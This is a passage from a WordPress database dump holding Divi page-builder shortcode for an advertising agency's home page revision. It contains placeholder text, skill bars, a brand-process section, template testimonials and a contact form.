custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\" hover_enabled=\"0\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-09 20:52:13','2020-07-09 20:52:13','',134,'https://52.66.212.87/2020/07/09/134-revision-v1/',0,'revision','',0),(307,1,'2020-07-09 20:52:59','2020-07-09 20:52:59','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" 